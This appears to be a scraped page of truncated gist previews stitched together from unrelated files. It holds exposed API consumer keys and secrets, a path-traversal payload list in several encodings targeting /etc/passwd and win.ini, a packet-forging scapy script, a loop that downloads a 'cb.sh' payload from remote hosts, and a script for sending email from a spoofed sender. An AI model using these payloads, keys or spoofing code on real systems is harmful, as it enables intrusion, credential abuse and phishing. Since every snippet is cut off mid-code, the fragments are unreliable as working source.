type: PIN
Consumer key: 3nVuSoBZnx6U4vzUxf5w
Consumer secret: Bcs59EFbbsdF6Sl9Ng71smgStWEGwXXKSjYvPVt7qys
type: PIN
Consumer key: IQKbtAYlXLripLGPWd0HUA
| [DISASM] | |
| 000000 // | |
| aaaaaa //Default color | |
| f3c5ff //Regular comment | |
| 7e6082 //Repeatable comment | |
| 7faa55 //Automatic comment | |
| ffffff //Instruction | |
| b9ebeb //Dummy Data Name | |
| b9ebeb //Regular Data Name | |
| bbecff //Demangled Name |
| #!/usr/bin/env python | |
| # Ref: https://stackoverflow.com/questions/287871/print-in-terminal-with-colors | |
| class bcolors: | |
| HEADER = '\033[95m' | |
| OKBLUE = '\033[94m' | |
| OKGREEN = '\033[92m' | |
| WARNING = '\033[93m' | |
| FAIL = '\033[91m' |
| # Author: samduy@github | |
| # Clear the screen after exiting Vim | |
| altscreen on | |
| # using mouse to select region | |
| # turning this on will lose the normal mouse control like select/copy/paste | |
| #mousetrack on | |
| # turn off welcome message |
| ../../../../../../../../../../../../etc/passwd | |
| ../../../../../../../../../../../../windows/win.ini | |
| %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd | |
| %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd | |
| %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd | |
| %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini | |
| %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd | |
| %252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc/passwd | |
| %2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc/passwd | |
| %252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd |
| import binascii, sys, string | |
| dataFormatHex = binascii.a2b_hex(sys.argv[1]) | |
| output = "" | |
| for char in dataFormatHex: | |
| if char in string.printable: output += char | |
| else: output += "." | |
| print "\n" + output |
| from scapy.all import * | |
| # Add iptables rule to block attack box from sending RSTs | |
| # Create web.txt with entire GET/POST packet data | |
| fileweb = open("web.txt",'r') | |
| data = fileweb.read() | |
| ip = IP(dst="<ip>") | |
| SYN=ip/TCP(rport=RandNum(6000,7000),dport=80,flags="S",seq=4) | |
| SYNACK = sr1(SYN) | |
| ACK=ip/TCP(sport=SYNACK.dport,dport=80,flags="A",seq=SYNACK.ack,ack=SYNACK.seq+1)/data | |
| reply,error = sr(ACK) |
| #!/usr/bin/python | |
| import urllib2, os | |
| urls = ["1.1.1.1","2.2.2.2"] | |
| port = "80" | |
| payload = "cb.sh" | |
| for url in urls: | |
| u = "http://%s:%s/%s" % (url, port, payload) | |
| try: |
| #!/usr/bin/python | |
| import smtplib, string | |
| import os, time | |
| os.system("/etc/init.d/sendmail start") | |
| time.sleep(4) | |
| HOST = "localhost" | |
| SUBJECT = "Email from spoofed sender" | |
| TO = "[email protected]" |
| # Create SSL cert (follow prompts for customization) | |
| # > openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes | |
| # Create httpserver.py | |
| import BaseHTTPServer,SimpleHTTPServer,ssl | |
| cert = "cert.pem" | |
| httpd = BaseHTTPServer.HTTPServer(('192.168.1.10',443),SimpleHTTPServer.SimpleHTTPRequestHandler) | |
| httpd.socket = ssl.wrap_socket(httpd.socket,certfile=cert,server_side=True) |